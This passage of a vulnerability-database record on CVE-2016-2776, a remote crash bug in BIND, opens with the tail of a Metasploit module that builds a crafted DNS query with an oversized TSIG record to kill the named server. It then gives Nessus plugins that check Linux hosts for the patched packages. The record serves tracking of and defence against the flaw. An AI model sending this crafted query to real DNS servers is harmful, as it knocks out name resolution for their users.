Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)\r\n\r\n # Aditional records. Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes\r\n query += \"\\x3d\"+Rex::Text.rand_text_alphanumeric(61)\r\n query += \"\\x00\"\r\n\r\n query += \"\\x00\\xfa\" # Type: TSIG (Transaction Signature) (250)\r\n query += \"\\x00\\xff\" # Class: ANY (0x00ff)\r\n query += \"\\x00\\x00\\x00\\x00\" # Time to live: 0\r\n query += \"\\x00\\xfc\" # Data length: 252\r\n\r\n # Algorithm Name\r\n query += (\"\\x3f\"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes\r\n query += \"\\x1A\"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes\r\n query += \"\\x00\"\r\n\r\n # Rest of TSIG\r\n query += \"\\x00\\x00\"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART\r\n query += \"\\x01\\x2c\" # Fudge: 300\r\n query += \"\\x00\\x10\" # MAC Size: 16\r\n query += Rex::Text.rand_text_alphanumeric(16) # MAC\r\n query += \"\\x8f\\x65\" # Original Id: 36709\r\n query += \"\\x00\\x00\" # Error: No error (0)\r\n query += \"\\x00\\x00\" # Other len: 0\r\n end\r\n\r\n def valid_query\r\n query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65\r\n query += \"\\x00\\x00\" # Flags: 0x0000 Standard query\r\n query += \"\\x00\\x01\" # Questions: 1\r\n query += \"\\x00\\x00\" # Answer RRs: 0\r\n query += \"\\x00\\x00\" # Authority RRs: 0\r\n query += \"\\x00\\x00\" # Additional RRs: 0\r\n\r\n # Doman Name\r\n query += get_domain # Random DNS Name\r\n query += \"\\x00\" # [End of name]\r\n query += \"\\x00\\x01\" # Type: A (Host Address) (1)\r\n query += \"\\x00\\x01\" # Class: IN (0x0001)s\r\n end\r\n\r\nend\r\n'''\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40453/"}], "nessus": [{"lastseen": "2021-01-17T13:49:23", 
"description": "Security Fix(es) :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet. (CVE-2016-2776)", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-29T00:00:00", "title": "Scientific Linux Security Update : bind on SL5.x, SL6.x, SL7.x i386/x86_64 (20160928)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-29T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-utils", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-devel", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "p-cpe:/a:fermilab:scientific_linux:bind-license", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:caching-nameserver", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11", "p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-libs", "p-cpe:/a:fermilab:scientific_linux:bind-lite-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:bind-libs-lite", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind"], "id": "SL_20160928_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/93797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93797);\n script_version(\"2.11\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x, SL6.x, SL7.x i386/x86_64 (20160928)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A denial of service flaw was found in the way BIND\n constructed a response to a query that met certain\n criteria. A remote attacker could use this flaw to make\n named exit unexpectedly with an assertion failure via a\n specially crafted DNS request packet. (CVE-2016-2776)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1609&L=scientific-linux-errata&F=&S=&P=9834\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7c9a9f2f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-pkcs11-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.9\")) flag++;\nif 
(rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bind-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-chroot-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-debuginfo-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-devel-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-libs-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-sdb-9.8.2-0.47.rc1.el6_8.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bind-utils-9.8.2-0.47.rc1.el6_8.1\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-debuginfo-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"bind-license-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-devel-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-pkcs11-libs-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"bind-pkcs11-utils-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-29.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-29.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T13:24:00", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2016-2776)", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-29T00:00:00", "title": "OracleVM 3.2 : bind (OVMSA-2016-0137)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-29T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:bind-libs"], "id": "ORACLEVM_OVMSA-2016-0137.NASL", "href": "https://www.tenable.com/plugins/nessus/93793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0137.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93793);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"OracleVM 3.2 : bind (OVMSA-2016-0137)\");\n 
script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2016-2776)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000554.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe125318\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 
and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-libs-9.3.6-25.P1.el5_11.9\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"bind-utils-9.3.6-25.P1.el5_11.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:04", "description": "Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional 
issues.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-06T00:00:00", "title": "Fedora 24 : 32:bind (2016-2d9825f7c1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:32:bind", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-2D9825F7C1.NASL", "href": "https://www.tenable.com/plugins/nessus/93878", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2d9825f7c1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93878);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-2d9825f7c1\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 24 : 32:bind (2016-2d9825f7c1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2d9825f7c1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 32:bind package.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:32:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bind-9.10.4-2.P3.fc24\", epoch:\"32\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"32:bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T14:46:28", "description": "The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 34, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "SUSE SLES11 Security Update : bind (SUSE-SU-2016:2405-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-utils", "p-cpe:/a:novell:suse_linux:bind-libs"], "id": "SUSE_SU-2016-2405-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93772", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2405-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93772);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"SUSE SLES11 Security Update : bind (SUSE-SU-2016:2405-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. 
(CVE-2016-2776, bsc#1000362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2776/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162405-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7d03875\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-bind-12763=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-bind-12763=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-bind-12763=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-bind-12763=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-bind-12763=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
